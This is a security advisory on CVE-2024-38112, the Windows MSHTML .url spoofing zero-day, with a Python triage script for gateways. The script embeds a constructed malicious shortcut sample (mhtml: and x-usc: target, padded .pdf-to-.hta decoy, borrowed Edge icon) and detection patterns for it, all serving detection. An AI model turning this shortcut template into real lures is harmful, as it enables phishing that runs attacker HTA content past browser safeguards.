CVE-2024-38112 (exploited in the wild)

Windows MSHTML platform, spoofing zero-day (Void Banshee)

Windows MSHTML Platform Spoofing Vulnerability. Successful exploitation requires the attacker to send the user a malicious file, which the user must execute.

Overview

CVE-2024-38112 is a high-severity (CVSS 7.5) spoofing vulnerability in the Windows MSHTML platform. It was reported by Check Point Research and was exploited as a zero-day by the threat actor tracked as Void Banshee from at least January 2024 until Microsoft shipped a fix in the July 9, 2024 security update. The bug lets an attacker craft an Internet Shortcut (.url) file whose target is prefixed with the mhtml: protocol handler; Windows hands such a target to the retired Internet Explorer/MSHTML engine instead of the default browser, so attacker-controlled content is rendered outside the security controls of a modern browser.

Technical Details

The vulnerability abuses how Windows dispatches Internet Shortcut (.url) files. A .url file is a small INI-style text file whose URL= line holds the target. If that target begins with the mhtml: handler (the samples seen in the wild also nest an x-usc: redirector inside it), Windows opens it with the legacy Internet Explorer/MSHTML engine rather than the default browser. This holds even on Windows 11 hosts with Microsoft Edge set as the default browser, where users and administrators assume IE is retired.

When the user opens the malicious .url file, MSHTML fetches and renders the attacker's content: in the observed campaigns an HTML Application (.hta) whose filename carried a decoy .pdf extension padded with non-printing characters so that the trailing .hta was not visible in the IE dialog. This path sidesteps:

  • The sandbox and site isolation of the modern Edge renderer
  • The SmartScreen and file-type warnings a user would normally see when opening a bare .hta file directly
  • Other standard browser security policies that IE/MSHTML never implemented

The attack requires user interaction: the victim must open the malicious .url file, which is typically delivered through social engineering in spear-phishing campaigns.

Impact

The vulnerability was used in real intrusions, not only in proof-of-concept form. Trend Micro attributed the in-the-wild exploitation to Void Banshee, which used the .url files to stage the Atlantida information stealer. The reported campaigns targeted financial services and educational institutions.

The .url file format proved particularly effective for attackers because:

  • These files appear as benign Internet shortcuts to users
  • They bypass many email gateway security filters
  • Users are typically trained to avoid .exe and .hta files but not .url files
  • The attack succeeded against targets where direct HTA delivery would have been blocked

The six-month zero-day exposure window (January-July 2024) provided attackers substantial time for exploitation.

Mitigation

  1. Apply the July 2024 cumulative update on all Windows hosts immediately
  2. Block .url file attachments at the email gateway; inbound Internet Shortcuts have few legitimate uses, and a shortcut is never needed to share a link
  3. Audit email gateway logs for .url attachments delivered during the January-July 2024 exposure window
  4. Review endpoint security policies to restrict execution of Internet Shortcut files from untrusted sources
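The following is an added example for this page, not code from Microsoft, Check Point or Trend Micro. It turns the .url mechanics described under Technical Details into a triage check a gateway filter or endpoint sweep (mitigation items 2 and 3) could run: it parses the INI-style shortcut and flags a URL= target prefixed with the mhtml: handler, an x-usc: redirector nested inside it, an .hta destination, a decoy extension padded with invisible characters in front of the real .hta, and an IconFile that borrows a program binary's icon. The two sample shortcuts are constructed (example.invalid domain, made-up filenames, an Edge icon index chosen for illustration) and are not real indicators; the set of padding characters is an assumption, not an exhaustive list.

```python
"""Triage Internet Shortcut (.url) files for the mhtml: / x-usc: / .hta tricks."""
import configparser
import re
from urllib.parse import unquote, urlsplit

# Invisible or whitespace code points used to pad a filename so the true
# extension is pushed out of view. Assumption: illustrative set, not exhaustive.
PADDING = "\u2800\u00a0\u200b\u3000\t "
DECOY_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt)$", re.IGNORECASE)


def load_url_text(data: bytes) -> str:
    """Decode a .url file: Windows writes UTF-8 (often with BOM), UTF-16 with BOM, or ANSI."""
    for enc in ("utf-8-sig", "utf-16", "cp1252"):
        try:
            return data.decode(enc)
        except UnicodeDecodeError:
            continue
    return data.decode("latin-1")


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] section as a dict, keeping key case.

    .url files are INI-style. The target may contain ':' and '%', so only '='
    delimits keys and value interpolation is disabled.
    """
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return dict(cp["InternetShortcut"]) if cp.has_section("InternetShortcut") else {}


def analyze_url_file(text: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    section = parse_url_file(text)
    target = section.get("URL", "").strip()
    if not target:
        return findings

    if target.lower().startswith("mhtml:"):
        findings.append("mhtml: prefix forces the legacy IE/MSHTML engine even when Edge is default")
    if "!x-usc:" in target.lower():
        findings.append("x-usc: redirector nested inside the mhtml: target")

    # The effective destination is whatever follows the last x-usc: segment.
    dest = re.split(r"!x-usc:", target, flags=re.IGNORECASE)[-1]
    dest = re.sub(r"^mhtml:", "", dest, flags=re.IGNORECASE)
    path = unquote(urlsplit(dest).path).rstrip(PADDING)
    if path.lower().endswith(".hta"):
        findings.append("destination is an HTML Application (.hta)")
        raw_stem = path[:-4]
        stem = raw_stem.rstrip(PADDING)
        decoy = DECOY_EXT.search(stem)
        if stem != raw_stem and decoy:  # padding sat between the decoy extension and .hta
            findings.append(f"decoy .{decoy.group(1).lower()} extension padded in front of the real .hta")

    icon = section.get("IconFile", "").strip().lower()
    if icon.endswith((".exe", ".dll")):
        findings.append(f"IconFile borrows an icon from a program binary: {section['IconFile']}")
    return findings


# Constructed samples for illustration only; the domain and names are not real indicators.
BENIGN_URL = """[InternetShortcut]
URL=https://learn.microsoft.com/
IconFile=C:\\Users\\user\\AppData\\Local\\Mozilla\\icons\\favicon.ico
IconIndex=0
"""

# %E2%A0%80 is U+2800 (Braille blank), the kind of padding used to hide ".hta".
MALICIOUS_URL = """[InternetShortcut]
URL=mhtml:http://cdn.example.invalid/docs/Report_2024.pdf%E2%A0%80%E2%A0%80%E2%A0%80.hta!x-usc:http://cdn.example.invalid/docs/Report_2024.pdf%E2%A0%80%E2%A0%80%E2%A0%80.hta
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
IconIndex=13
ShowCommand=7
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_URL), ("malicious", MALICIOUS_URL)):
        print(name, analyze_url_file(sample) or ["no findings"])
```

Run against a quarantine directory, feed each file through load_url_text() and then analyze_url_file(); any shortcut whose target starts with mhtml: deserves a block outright, while the .hta and decoy-extension findings are the ones to prioritise when sweeping endpoints for the exposure window.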

Detection

Organizations should sweep endpoints for indicators of compromise associated with the Atlantida infostealer, for example:

  • Suspicious artifacts under %LOCALAPPDATA%
  • Scheduled tasks named after Microsoft products that are not legitimate Microsoft tasks
  • Internet Shortcut files in user download and mail-attachment directories whose URL= target begins with mhtml:

The concrete hashes, domains and file paths to match against are in Trend Micro's published write-up on the Void Banshee campaign; prefer those over the generic patterns above wherever they apply.